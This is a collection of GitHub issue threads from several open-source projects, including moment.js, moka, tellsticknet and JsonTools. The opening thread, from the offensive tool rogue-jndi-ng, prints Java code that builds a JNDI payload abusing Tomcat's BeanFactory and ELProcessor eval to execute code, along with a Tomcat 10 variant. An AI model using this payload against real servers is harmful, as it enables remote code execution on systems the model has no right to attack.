{ "authors": [ "h0ng10", "hyeok-kong", "theGEBIRGE" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8658", "repo": "mogwailabs/rogue-jndi-ng", "url": "https://github.com/mogwailabs/rogue-jndi-ng/issues/1" }
gharchive/issue
Add support for Tomcat 10
With Tomcat 10, the expression engine (within el-api.jar) moved to the jakarta.el package, so the payload for Tomcat no longer works on Tomcat 10. We need to create a new Controller that handles these cases.
The actual change would be minimal: basically, change "javax.el.ELProcessor" to "jakarta.el.ELProcessor".
// prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "x=eval"));
ref.add(new StringRefAddr("x", payload));
Hello! I would like to contribute to this issue. Could you please assign it to me? :)
Hi! It's already done, see d46724f677330653463b748ee7e284a94be58c0e.
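A sketch of the described change applied to the snippet above; only the class name moves to the jakarta namespace, the rest of the payload construction is assumed unchanged:
// Tomcat 10: the EL engine now lives in the jakarta.el package
ResourceRef ref = new ResourceRef("jakarta.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "x=eval"));
ref.add(new StringRefAddr("x", payload));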
2025-04-01T06:39:39.401196
2014-05-26T18:20:12
34322982
{ "authors": [ "data-doge", "thejsj" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8659", "repo": "mohayonao/timbre.js", "url": "https://github.com/mohayonao/timbre.js/issues/18" }
gharchive/issue
npm module requires 'lame' module, but it's not listed as a dependency
When you try to require('timbre') it throws the following error:
Warning: Cannot find module 'lame' from '/Users/jorgesilva/Sites/2014/clickOnJorge/node_modules/timbre'
Use --force to continue.
This seems to be because this package is not listed as a dependency in the package.json. The fix should be as simple as:
npm install lame --save
If y'all are getting this error when using timbre.js with browserify, you can use the --ignore-missing flag to skip the unresolved requires for lame, ogg, and vorbis.
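For the browserify case, that flag is passed on the command line; a sketch, with hypothetical file names:
browserify app.js --ignore-missing -o bundle.js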
2025-04-01T06:39:39.408283
2024-05-25T16:05:32
2317102020
{ "authors": [ "mohrazzak", "yangricardo" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8660", "repo": "mohrazzak/better-nestjs-zod-prisma", "url": "https://github.com/mohrazzak/better-nestjs-zod-prisma/issues/2" }
gharchive/issue
Documentation doubts and improvement requests
Hi,
First, thanks for the initiative. I also used the old nestjs-zod and had no idea it was fully discontinued.
Does your generator use the same structure as nest-zod-prisma? It would be nice to have it better described, with docs on how to use it.
Hi, I am very sorry I didn't see your issue.
Yes, it uses the same generator, but I have applied some improvements described in the docs, such as nullable and nullish, the repeated Enum import in schemas, and so on.
I actually would love to write a good description but I really don't have a lot of time for now, so I would appreciate any PR. If you need any more information about the package you can reach me in a Discord call and I would love to explain what is foggy for you so you can PR here. Appreciate it! @yangricardo @timseriakov
Though I think it is clearer with these changes I made to the README. Please check that so I can close this.
2025-04-01T06:39:39.428547
2024-01-19T01:10:19
2089370123
{ "authors": [ "agiuliano", "tatsuya6502", "unikzforce" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8661", "repo": "moka-rs/moka", "url": "https://github.com/moka-rs/moka/issues/379" }
gharchive/issue
Add an example to show how to run pending tasks in an interval
Split from https://github.com/moka-rs/moka/issues/349#issuecomment-1819114103
Hi. It does not have to be the run_pending_tasks method, but you need to call some of the cache methods such as get, get_with, insert, or remove to drive the eviction_listener. Before v0.12.0, Moka had its own global thread pool to periodically run pending tasks. Some users did not like it, so we removed it. You will find more details on when pending tasks (internal maintenance tasks) are executed here: https://github.com/moka-rs/moka/blob/main/MIGRATION-GUIDE.md#the-maintenance-tasks
But I want the eviction_listener() to be called exactly at the time of eviction, not some time later. Can you please help me understand what I should do?
You can spawn a thread and make it call run_pending_tasks at some interval (e.g. 0.1 secs). If you need some code samples, I could write one for you.
CC: @unikzforce
Thanks
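A minimal sketch of that workaround, assuming moka's sync cache (the key/value types and the 0.1 s interval are illustrative):
use std::{thread, time::Duration};
use moka::sync::Cache;

fn spawn_maintenance_thread(cache: Cache<String, String>) {
    // Cache handles are cheap to clone and thread-safe, so the caller can
    // pass a clone into a background thread that drives pending tasks
    // (and therefore the eviction listener) on a fixed interval.
    thread::spawn(move || loop {
        cache.run_pending_tasks();
        thread::sleep(Duration::from_millis(100));
    });
}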
2025-04-01T06:39:39.472159
2018-08-22T22:21:46
353147707
{ "authors": [ "mannerydhe", "molobrakos" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8662", "repo": "molobrakos/tellsticknet", "url": "https://github.com/molobrakos/tellsticknet/issues/12" }
gharchive/issue
Problem getting started
Hi,
This looks awesome and I'd love to get it up and running. Please tell me if I'm missing something.
I've compiled it using make under Linux. Everything checks out OK and I can properly discover my TellstickNet on the network by running the command:
python3 -m tellsticknet -vv discover
That's about it. I want to use it in conjunction with Home Assistant using the mqtt option. However, I run into the following problems:
1. Using the provided example configuration, the command python3 -m tellsticknet -vv devices throws the following error:
18-08-22 23:45.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet_api/tellsticknet/tellsticknet.conf
18-08-22 23:45.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet_api/tellsticknet/.tellsticknet.conf
18-08-22 23:45.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet.conf
- Door
Traceback (most recent call last):
  File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main
    "__main__", mod_spec)
  File "/usr/lib/python3.6/runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "/home/homeassistant/tellsticknet_api/tellsticknet/__main__.py", line 162, in <module>
    for e in (e for e in read_config() if e['class'] == 'command'):
  File "/home/homeassistant/tellsticknet_api/tellsticknet/__main__.py", line 162, in <genexpr>
    for e in (e for e in read_config() if e['class'] == 'command'):
KeyError: 'class'
Neither commenting out the class setting nor deleting it resolves the issue.
2. Trying to turn on a light (using the house and unit from Telldus Live), python3 -m tellsticknet -vv send protocol=arctech model=selflearning house=5092673 unit=1 cmd=turnon throws the following error:
18-08-22 23:59.29 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet.conf
method not found
It doesn't matter if cmd=on, ON, turnon, turnoff etc.; same result.
3. Trying to connect to a local mqtt broker using python3 -m tellsticknet -vv mqtt with .config/mosquitto_pub containing the following information:
-h localhost
-p 1883
-username test
-pw test
results in the following error:
18-08-23 00:07.58 DEBUG (MainThread) [tellsticknet.mqtt] Connecting
Traceback (most recent call last):
  File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main
    "__main__", mod_spec)
  File "/usr/lib/python3.6/runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "/home/homeassistant/tellsticknet_api/tellsticknet/__main__.py", line 208, in <module>
    run(config, host=host)
  File "/home/homeassistant/tellsticknet_api/tellsticknet/mqtt.py", line 574, in run
    port=int(credentials['port']))
  File "/usr/local/lib/python3.6/dist-packages/paho_mqtt-1.3.1-py3.6.egg/paho/mqtt/client.py", line 768, in connect
    return self.reconnect()
  File "/usr/local/lib/python3.6/dist-packages/paho_mqtt-1.3.1-py3.6.egg/paho/mqtt/client.py", line 927, in reconnect
    sock.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 1068, in do_handshake
    self._sslobj.do_handshake()
  File "/usr/lib/python3.6/ssl.py", line 689, in do_handshake
    self._sslobj.do_handshake()
ConnectionResetError: [Errno 104] Connection reset by peer
I can successfully publish to the mqtt broker using Node-RED. I suspect that I'm missing something crucial here, since you've got it running just fine. Looking forward to your response.
Happy to hear you want to use my code, thanks for testing and finding bugs!
1. Is fixed here.
2. I noticed that I actually never implemented specifying params on the command line this way. Clarified it now. If you have a valid config file you should be able to do tellsticknet send livingroom on, tellsticknet send kitchen dim 50, etc.
3. I believe this is because the code currently only supports connecting to the MQTT broker using SSL. I'm running my broker with SSL enabled on port 8883 and it works. So your options are to enable non-SSL in the client code (should not be too hard), or to enable SSL in your MQTT broker.
Thank you for the quick response! Are Nexa switches supported? Trying to turn on a Nexa switch using the device name throws an error about not finding "nexa.encode". I can provide you a debug log when I get home.
Here is the log as promised:
18-08-23 20:35.09 INFO (MainThread) [tellsticknet.discovery] Discovering tellstick devices ...
18-08-23 20:35.09 INFO (MainThread) [tellsticknet.discovery] Found TellStickNet device with firmware 17 at <IP_ADDRESS>
18-08-23 20:35.09 DEBUG (MainThread) [tellsticknet.controller] creating controller with address <IP_ADDRESS> (ACCA5400218D)
18-08-23 20:35.09 DEBUG (SenderThread) [tellsticknet.controller] Waiting for command forever
18-08-23 20:35.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet_api/tellsticknet/tellsticknet.conf
18-08-23 20:35.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet_api/tellsticknet/.tellsticknet.conf
18-08-23 20:35.09 DEBUG (MainThread) [__main__] checking for config file /home/homeassistant/tellsticknet.conf
18-08-23 20:35.09 DEBUG (MainThread) [tellsticknet.controller] Sending time 1
18-08-23 20:35.09 DEBUG (MainThread) [tellsticknet.protocol] Encoding for protocol nexa
Traceback (most recent call last):
  File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main
    "__main__", mod_spec)
  File "/usr/lib/python3.6/runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "/home/homeassistant/tellsticknet_api/tellsticknet/__main__.py", line 203, in <module>
    controller.execute(device, method, param=param)
  File "/home/homeassistant/tellsticknet_api/tellsticknet/controller.py", line 135, in execute
    self._execute(device, method, param)
  File "/home/homeassistant/tellsticknet_api/tellsticknet/controller.py", line 115, in _execute
    packet = encode(**device, method=method, param=param)
  File "/home/homeassistant/tellsticknet_api/tellsticknet/protocol.py", line 314, in encode
    return protocol.encode(**device)
AttributeError: module 'tellsticknet.protocols.nexa' has no attribute 'encode'
Should python3 -m tellsticknet -vv listen generate something more than this?
18-08-23 20:37.59 INFO (MainThread) [tellsticknet.discovery] Discovering tellstick devices ...
18-08-23 20:37.59 INFO (MainThread) [tellsticknet.discovery] Found TellStickNet device with firmware 17 at <IP_ADDRESS>
18-08-23 20:37.59 DEBUG (MainThread) [tellsticknet.controller] creating controller with address <IP_ADDRESS> (ACCA5400218D)
18-08-23 20:37.59 DEBUG (SenderThread) [tellsticknet.controller] Waiting for command forever
18-08-23 20:37.59 DEBUG (MainThread) [tellsticknet.controller] Listening for signals from <IP_ADDRESS>
18-08-23 20:37.59 INFO (MainThread) [tellsticknet.controller] Registering self as listener for device at <IP_ADDRESS>
18-08-23 20:37.59 DEBUG (MainThread) [tellsticknet.controller] Sending packet to controller <IP_ADDRESS>:42314 <b'B:reglistener'>
Have you specified protocol, model, house, unit in tellsticknet.conf? Like:
controller: abc123
name: Sovrum
component: light
protocol: arctech
model: selflearning
unit: 15
house: 45213512
---
... etc
You can find out what parameters to use by starting tellsticknet -vv listen and then start pressing buttons on your Nexa controller. Then you should get decoded packets displayed in the console.
Great! I got it working with one of my Nexa switches. The one I got working is just a regular power outlet. I've got another Nexa device, supposed to be mounted behind a regular wall switch, which doesn't work. It's called "self-learning Pro" in Telldus Live. Any idea? Have you tried Jula's Anslut? Sorry for all the questions. When I get the time I'll try to sniff out the packets sent from Telldus Live to the Tellstick and compare them.
Ok, I ended up programming it myself using Node-RED. Analysing the packets sent using tcpdump, I found that Nexa Pro and Jula are the same protocol and very similar to Nexa (built-in arctech). The Nexa (arctech) house code is 26 bits; the Jula Anslut and Nexa Pro house codes are also 26 bits but have to end in 10. Telldus Live had a problem early on where Jula's Anslut wouldn't work if you didn't pick a house code which ended in 10 (binary). It seems that if the house code doesn't end correctly, it just zero-pads it to 24 bits and adds 10 to the end of it, making it 26 bits.
Closing for now. Feel free to provide suggestions for changes as PRs.
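A sketch of that padding rule in JavaScript (Node-RED context; the function name is illustrative): pad the chosen house code to 24 bits, then append the binary suffix 10 to form the 26-bit code that Jula Anslut / Nexa Pro devices expect:
function toSelfLearningProHouseCode(houseCode) {
  // Zero-pad the house code to 24 bits, as described above.
  const bits24 = houseCode.toString(2).padStart(24, '0');
  // Append the binary suffix "10", yielding a 26-bit code ending in 10.
  return parseInt(bits24 + '10', 2);
}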
2025-04-01T06:39:39.482456
2024-10-22T14:58:51
2605718482
{ "authors": [ "KeanuTang", "molsonkiko" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8663", "repo": "molsonkiko/JsonToolsNppPlugin", "url": "https://github.com/molsonkiko/JsonToolsNppPlugin/issues/81" }
gharchive/issue
Weird Decimal Conversion Issue
Here's a simple scenario. I have the following JSON:
{"Amount": 11.11}
When I run "Pretty-print current JSON file", the number changes from 11.11 to 11.109999999999999.
This is not a bug per se, but rather an unfortunate consequence of my fix to #78. Since loss of precision (that issue) means unrecoverable and unnecessary loss of information, whereas your issue is merely an unnecessarily ugly string representation of a number, I will leave this unfixed. If you're confused, I recommend that you Google "floating point imprecision" to help you understand why some imprecision is unavoidable.
It seems fundamentally wrong that a plugin that is supposed to "pretty print" JSON ends up manipulating the JSON data. That means that I can't use and trust your plugin's output, because this is absolutely not just an "ugly string representation." 11.11 and 11.1099999xxx are completely different numbers, and "close enough" does not work in the real world of business and science.
@KeanuTang I recommend that you stop wasting your breath chiding me for this issue. I will not fix it myself, because as I already explained I don't believe that the alternative solutions are acceptable or feasible to implement, as they involve (a) massive refactoring and loss of performance to pivot from double-precision floating point numbers to decimal numbers, (b) loss of precision when pretty-printing other numbers and thus a regression on #78, or (c) implementing my own (undoubtedly bug-ridden) algorithm that somehow fixes your issue while still using doubles. You are welcome to submit a PR that would fix this issue, but don't be surprised if I reject it because I don't like the tradeoffs you made.
There are other JSON plugins you can try if you don't like this one. There is a strong likelihood that they will have the same issue that mine does, because almost everyone uses double-precision floating point numbers to represent real numbers because, again, the alternative solutions are much harder to use and less performant.
The reason I said this is not a bug in my original comment is that 11.11 is not "close enough" to 11.109999999999999 as far as double-precision floating point numbers are concerned; it is equal. By contrast, the earlier algorithm I was using was changing the string representation in a way that would be parsed to a non-equal double. Decimals are not a reasonable substitute because the maximum value for a decimal is far less (7.9e28) than the maximum value for a double (1.8e308). Any alternative with no rounding errors for any number of reasonable size would require me to fish for some third-party library that provides a higher-precision numeric specification while still having comparable performance and memory usage to doubles and an equally generous range of acceptable values, and then tediously change every double parameter, return type, and variable initialization in the entire plugin to the different type. But be warned; that plugin also uses doubles to represent real numbers, and I have no idea how their double-to-decimal and decimal-to-double algorithms compare to the one I'm using. They may be strictly better, or it may just make a different set of tradeoffs than the one I'm using. Regardless, since they use the same data type, they are subject to the same fundamental limitations as my plugin.
The only thing I know for sure is that if I try to implement these conversion algorithms myself, I will almost certainly do a worse job than the standard library and introduce many subtle bugs. If you think you can do a better job than the C# standard library, or can point me to a library that you are extremely confident does better than the standard library, I would consider a fix.
@KeanuTang This commit should address this issue. If you follow my instructions for downloading an unreleased version, you can test out this fix and see if it is to your liking. As I noted in the changelog, this fix comes at the cost of noticeably worse performance when reformatting very large files (say, several megabytes or more). At some point I will see if I can implement a more performant solution. Please let me know if you have any thoughts. If you are satisfied with this fix, I will be including it in v8.2 of JsonTools, which I aim to release in the next few weeks. I must extend my sincerest apology to you for effectively gaslighting you and trying to trivialize what was in fact a real and substantial issue with my plugin.
JsonTools version 8.2, incorporating a fix for this issue, is now live. I will soon submit a PR to include v8.2 in the plugins manager.
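To make the maintainer's equality claim above concrete, a quick check in the plugin's language (C#): both strings parse to the very same IEEE 754 double, so the long form is only an uglier spelling of the same value:
using System;
using System.Globalization;

// Both string spellings map to the identical double bit pattern.
double a = double.Parse("11.11", CultureInfo.InvariantCulture);
double b = double.Parse("11.109999999999999", CultureInfo.InvariantCulture);
Console.WriteLine(a == b); // True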
2025-04-01T06:39:39.510521
2020-05-18T01:39:04
619849912
{ "authors": [ "AsimNet", "johnberry09", "momander" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8664", "repo": "momander/wheel-spinner", "url": "https://github.com/momander/wheel-spinner/issues/6" }
gharchive/issue
[feat] [while spin] Show the names in plain text
Hello 👋 Thanks for the great work! Is it possible to show the names above the wheel in plain text? Because when we add 200+ names, you won't be able to read the names from the wheel. https://youtu.be/yL5clbrvmyY?t=480 Thanks
Thank you for the proposal, Asim! Could you add some more details? I don't think I understand, but I would like to.
Here's an example: https://drive.google.com/file/d/1Ewh_kkJ98dipRevxCilRH2a8KeqUK7iT/view?usp=drivesdk
Ah, very good, now I get it. Thank you for sending this! I think it looks great. Will add it to the list of things to build next.
The Wheel has a method getNameAtPointer(). A naive approach would be to call a function at an interval and update the DOM innerText; depending on the interval, the value will not be in exact sync with the entry at the pointer. Also, updating the DOM innerText too frequently will have performance implications. A slightly better-performing approach would be to raise events as the value at the pointer changes; however, this will still have issues at high rotation speed, unless the values are only updated below a certain speed. The correct way to solve this would be to use the same animation approach used to spin the wheel. That way both the name at the pointer and the displayed name value will always be in sync, as the browser paints them.
Excellent analysis, johnberry09! Thank you.
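A sketch of the naive interval approach described above, assuming a wheel instance exposing getNameAtPointer() as mentioned; the element id and interval are illustrative:
const label = document.getElementById('current-name'); // hypothetical element
setInterval(() => {
  const name = wheel.getNameAtPointer();
  // Skip redundant DOM writes to limit the performance cost noted above.
  if (label.innerText !== name) label.innerText = name;
}, 100); // the interval trades pointer-sync accuracy against DOM-update cost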
2025-04-01T06:39:39.539356
2016-02-01T02:48:47
130237768
{ "authors": [ "Assem-Hafez", "InstanceOfMichael", "Knjaz89", "M7Arman", "behrangsa", "bonesoul", "daniaaalarshad", "eitanfr", "michaelhayman", "mj1856", "samslow" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8665", "repo": "moment/moment", "url": "https://github.com/moment/moment/issues/2934" }
gharchive/issue
Possible to get week number relative to month?
week() returns the week number relative to the year; what I'd like to get is the week number relative to the month. Is it possible?
It's not built-in, but basically you can subtract the week number of the start of the month from the week number of the date in question:
function weekOfMonth(m) {
  return m.week() - moment(m).startOf('month').week() + 1;
}
Note that the week function is locale specific, so in some cases you might want to use isoWeek instead. (See the docs.)
If someone wants to add this to moment, a PR with the above function (or similar) and related unit tests would be appreciated.
Tracking in PR #2965. Thanks!
What about adding this ability to the format function?
Regarding the weekOfMonth function above: moment("2018-12-31") -> weekOfMonth = -48
In some years week() will return 1 for the last days of the year, see #4019, so it messes up the calculations as @Knjaz89 mentioned. Therefore the right way to calculate the weekOfMonth is:
function weekOfMonth(date) {
  let weekInYearIndex = date.week();
  if (date.year() !== date.weekYear()) {
    weekInYearIndex = date.clone().subtract(1, 'week').week() + 1;
  }
  const weekIndex = weekInYearIndex - moment(date).startOf('month').week() + 1;
  return weekIndex;
}
weekOfMonth(moment('2018-12-31T00:00:00.000Z')); // returns 6
weekOfMonth(moment('2019-01-01T00:00:00.000Z')); // returns 1
Up until 2020 it was difficult to calculate the week index number, but it was settled with the help of @eitanfr. Thank you.
I did it in this way:
const weekOfMonth = (date) => {
  const dayInMonth = moment(date).date();
  return Math.floor(dayInMonth / 7);
}
Regarding the weekOfMonth(date) function by @eitanfr above: for 02.01.2020 it will return -52, so I fixed that case:
function getWeekOfMonth(dateObj) {
  const date = m(dateObj);
  const weekInYear = date.isoWeek();
  const result = weekInYear - date.startOf('month').isoWeek();
  return result < 0 ? weekInYear : result;
}
Regarding the original weekOfMonth function: awesome (y)
FYI @M7Arman: it doesn't work for 2020-08-30; your function reports week 4, but we're in week 6.
@michaelhayman you mean we are in week 5?
This doesn't work if the last week of the month is shared with the next year, e.g. 31 Dec 2020 is considered week 1 in the new year. This was my solution to the problem:
function getWeekIndexInMonth(day) {
  const startOfMonth = moment(day).startOf('month');
  const endOfMonth = moment(day).endOf('month');
  let currentMomentDate = moment(startOfMonth);
  const weeks = [];
  while (currentMomentDate.isBefore(endOfMonth)) {
    weeks.push(currentMomentDate.week());
    currentMomentDate.add(1, "weeks").startOf("week");
  }
  return weeks.indexOf(day.week());
}
Regarding the original weekOfMonth function: just FYI, if I don't set the locale I get unexpected results. Here's an example where I don't set the locale and I get unexpected results (negative weeks of month):
import moment from "moment";

function weekOfMonth(m) {
  return m.week() - moment(m).startOf('month').week() + 1;
}

const m = moment();
m.set({year: 2021, month: 11, date: 1}); // (months are 0-based, days are 1-based)
const decNumDays = m.daysInMonth();
console.log("Number of days in December:", decNumDays);
const result = [];
for (let date = 1; date <= decNumDays; date++) {
  m.set('date', date);
  result.push({
    dayName: m.format("dddd"),
    dayOfMonth: date,
    weekOfMonth: weekOfMonth(m)
  })
}
console.log(result)
Result:
[ { dayName: 'Wednesday', dayOfMonth: 1, weekOfMonth: 1 }, { dayName: 'Thursday', dayOfMonth: 2, weekOfMonth: 1 }, { dayName: 'Friday', dayOfMonth: 3, weekOfMonth: 1 },
  { dayName: 'Saturday', dayOfMonth: 4, weekOfMonth: 1 }, { dayName: 'Sunday', dayOfMonth: 5, weekOfMonth: 2 }, { dayName: 'Monday', dayOfMonth: 6, weekOfMonth: 2 },
  { dayName: 'Tuesday', dayOfMonth: 7, weekOfMonth: 2 }, { dayName: 'Wednesday', dayOfMonth: 8, weekOfMonth: 2 }, { dayName: 'Thursday', dayOfMonth: 9, weekOfMonth: 2 },
  { dayName: 'Friday', dayOfMonth: 10, weekOfMonth: 2 }, { dayName: 'Saturday', dayOfMonth: 11, weekOfMonth: 2 }, { dayName: 'Sunday', dayOfMonth: 12, weekOfMonth: 3 },
  { dayName: 'Monday', dayOfMonth: 13, weekOfMonth: 3 }, { dayName: 'Tuesday', dayOfMonth: 14, weekOfMonth: 3 }, { dayName: 'Wednesday', dayOfMonth: 15, weekOfMonth: 3 },
  { dayName: 'Thursday', dayOfMonth: 16, weekOfMonth: 3 }, { dayName: 'Friday', dayOfMonth: 17, weekOfMonth: 3 }, { dayName: 'Saturday', dayOfMonth: 18, weekOfMonth: 3 },
  { dayName: 'Sunday', dayOfMonth: 19, weekOfMonth: 4 }, { dayName: 'Monday', dayOfMonth: 20, weekOfMonth: 4 }, { dayName: 'Tuesday', dayOfMonth: 21, weekOfMonth: 4 },
  { dayName: 'Wednesday', dayOfMonth: 22, weekOfMonth: 4 }, { dayName: 'Thursday', dayOfMonth: 23, weekOfMonth: 4 }, { dayName: 'Friday', dayOfMonth: 24, weekOfMonth: 4 },
  { dayName: 'Saturday', dayOfMonth: 25, weekOfMonth: 4 }, { dayName: 'Sunday', dayOfMonth: 26, weekOfMonth: -47 }, { dayName: 'Monday', dayOfMonth: 27, weekOfMonth: -47 },
  { dayName: 'Tuesday', dayOfMonth: 28, weekOfMonth: -47 }, { dayName: 'Wednesday', dayOfMonth: 29, weekOfMonth: -47 }, { dayName: 'Thursday', dayOfMonth: 30, weekOfMonth: -47 },
  { dayName: 'Friday', dayOfMonth: 31, weekOfMonth: -47 } ]
And here's an example where I get correct results when I set the locale:
import moment from "moment";
moment.locale('en-au');

function weekOfMonth(m) {
  return m.week() - moment(m).startOf('month').week() + 1;
}

const m = moment();
m.set({year: 2021, month: 11, date: 1}); // (months are 0-based, days are 1-based)
const decNumDays = m.daysInMonth();
console.log("Number of days in December:", decNumDays);
const result = [];
for (let date = 1; date <= decNumDays; date++) {
  m.set('date', date);
  result.push({
    dayName: m.format("dddd"),
    dayOfMonth: date,
    weekOfMonth: weekOfMonth(m)
  })
}
console.log(result)
Result:
[ { dayName: 'Wednesday', dayOfMonth: 1, weekOfMonth: 1 }, { dayName: 'Thursday', dayOfMonth: 2, weekOfMonth: 1 }, { dayName: 'Friday', dayOfMonth: 3, weekOfMonth: 1 },
  { dayName: 'Saturday', dayOfMonth: 4, weekOfMonth: 1 }, { dayName: 'Sunday', dayOfMonth: 5, weekOfMonth: 2 }, { dayName: 'Monday', dayOfMonth: 6, weekOfMonth: 2 },
  { dayName: 'Tuesday', dayOfMonth: 7, weekOfMonth: 2 }, { dayName: 'Wednesday', dayOfMonth: 8, weekOfMonth: 2 }, { dayName: 'Thursday', dayOfMonth: 9, weekOfMonth: 2 },
  { dayName: 'Friday', dayOfMonth: 10, weekOfMonth: 2 }, { dayName: 'Saturday', dayOfMonth: 11, weekOfMonth: 2 }, { dayName: 'Sunday', dayOfMonth: 12, weekOfMonth: 3 },
  { dayName: 'Monday', dayOfMonth: 13, weekOfMonth: 3 }, { dayName: 'Tuesday', dayOfMonth: 14, weekOfMonth: 3 }, { dayName: 'Wednesday', dayOfMonth: 15, weekOfMonth: 3 },
  { dayName: 'Thursday', dayOfMonth: 16, weekOfMonth: 3 }, { dayName: 'Friday', dayOfMonth: 17, weekOfMonth: 3 }, { dayName: 'Saturday', dayOfMonth: 18, weekOfMonth: 3 },
  { dayName: 'Sunday', dayOfMonth: 19, weekOfMonth: 4 }, { dayName: 'Monday', dayOfMonth: 20, weekOfMonth: 4 }, { dayName: 'Tuesday', dayOfMonth: 21, weekOfMonth: 4 },
  { dayName: 'Wednesday', dayOfMonth: 22, weekOfMonth: 4 }, { dayName: 'Thursday', dayOfMonth: 23, weekOfMonth: 4 }, { dayName: 'Friday', dayOfMonth: 24, weekOfMonth: 4 },
  { dayName: 'Saturday', dayOfMonth: 25, weekOfMonth: 4 }, { dayName: 'Sunday', dayOfMonth: 26, weekOfMonth: 5 }, { dayName: 'Monday', dayOfMonth: 27, weekOfMonth: 5 },
  { dayName: 'Tuesday', dayOfMonth: 28, weekOfMonth: 5 }, { dayName: 'Wednesday', dayOfMonth: 29, weekOfMonth: 5 }, { dayName: 'Thursday', dayOfMonth: 30, weekOfMonth: 5 },
  { dayName: 'Friday', dayOfMonth: 31, weekOfMonth: 5 } ]
2025-04-01T06:39:39.543223
2018-07-27T09:44:50
345161377
{ "authors": [ "coveralls", "kylekatarnls", "marwahaha" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8666", "repo": "moment/moment", "url": "https://github.com/moment/moment/pull/4719" }
gharchive/pull-request
Fix inconsistent output on new year
Comparing the last week of year N and the first week of year N+1 produced a wrong result.
Coverage remained the same at 94.647% when pulling 9844b4476ef1a63f9ece2dde061d685aa75cc1fb on kylekatarnls:patch-2 into 2e2a5b35439665d4b0200143d808a7c26d6cd30f on moment:develop.
@kylekatarnls - please add a test case documenting what you are trying to change.
You get inconsistency on year overlap:
moment('2017-12-31').locale('ja').calendar(moment('2018-01-03')) // "日曜日 00:00"
moment('2018-01-06').locale('ja').calendar(moment('2018-01-09')) // "先週土曜日 00:00"
Both should return "先週土曜日 00:00".
You can see on this PR that the week comparison is currently done with <, which fails for 52 (2017) < 1 (2018).
2025-04-01T06:39:39.546567
2024-04-30T03:50:53
2270445171
{ "authors": [ "momento-github-actions-machine-user" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8667", "repo": "momentohq/client-sdk-ruby", "url": "https://github.com/momentohq/client-sdk-ruby/pull/169" }
gharchive/pull-request
chore(main): release momento 0.4.9 :robot: I have created a release beep boop 0.4.9 (2024-04-30) Bug Fixes remove token and specify email for the redundant tag (#168) (c119376) This PR was generated with Release Please. See documentation. :robot: Release is at https://github.com/momentohq/client-sdk-ruby/releases/tag/momento/v0.4.9 :sunflower:
2025-04-01T06:39:39.549455
2023-02-16T00:49:23
1586814519
{ "authors": [ "kvcache" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8668", "repo": "momentohq/momento-cli", "url": "https://github.com/momentohq/momento-cli/pull/259" }
gharchive/pull-request
chore: add heartbeat support
Bumping the SDK version for heartbeat support. Interrupted will now happen for this class of timeout instead of a stream read error.
Here's a fresh subscription receiving a heartbeat on subscribe:
$ momento -p alpha topic subscribe asd --cache roflmao --verbose
[2023-02-16T00:42:56Z DEBUG momento::utils::user] Token already expired at: 2022-06-02 23:54:38 UTC
[2023-02-16T00:42:56Z DEBUG momento::utils::user] No session found in .momento_session profile...
[2023-02-16T00:42:56Z DEBUG rustls::anchors] add_parsable_certificates processed 166 valid and 0 invalid certs
[2023-02-16T00:42:56Z DEBUG hyper::client::connect::dns] resolving host="cache.cell-alpha-dev.preprod.a.momentohq.com"
[2023-02-16T00:42:56Z DEBUG hyper::client::connect::http] connecting to <IP_ADDRESS>:443
[2023-02-16T00:42:56Z DEBUG hyper::client::connect::http] connected to <IP_ADDRESS>:443
[2023-02-16T00:42:56Z DEBUG rustls::client::hs] No cached session for DnsName(DnsName(DnsName("cache.cell-alpha-dev.preprod.a.momentohq.com")))
[2023-02-16T00:42:56Z DEBUG rustls::client::hs] Not resuming any session
[2023-02-16T00:42:56Z DEBUG rustls::client::hs] Using ciphersuite Tls13(Tls13CipherSuite { suite: TLS13_AES_256_GCM_SHA384, bulk: Aes256Gcm })
[2023-02-16T00:42:56Z DEBUG rustls::client::tls13] Not resuming
[2023-02-16T00:42:56Z DEBUG rustls::client::tls13] TLS1.3 encrypted extensions: [Protocols([PayloadU8([104, 50])])]
[2023-02-16T00:42:56Z DEBUG rustls::client::hs] ALPN protocol is Some(b"h2")
[2023-02-16T00:42:56Z DEBUG h2::client] binding client connection
[2023-02-16T00:42:56Z DEBUG h2::client] client connection bound
[2023-02-16T00:42:56Z DEBUG h2::codec::framed_write] send frame=Settings { flags: (0x0), enable_push: 0, initial_window_size: 2097152, max_frame_size: 16384 }
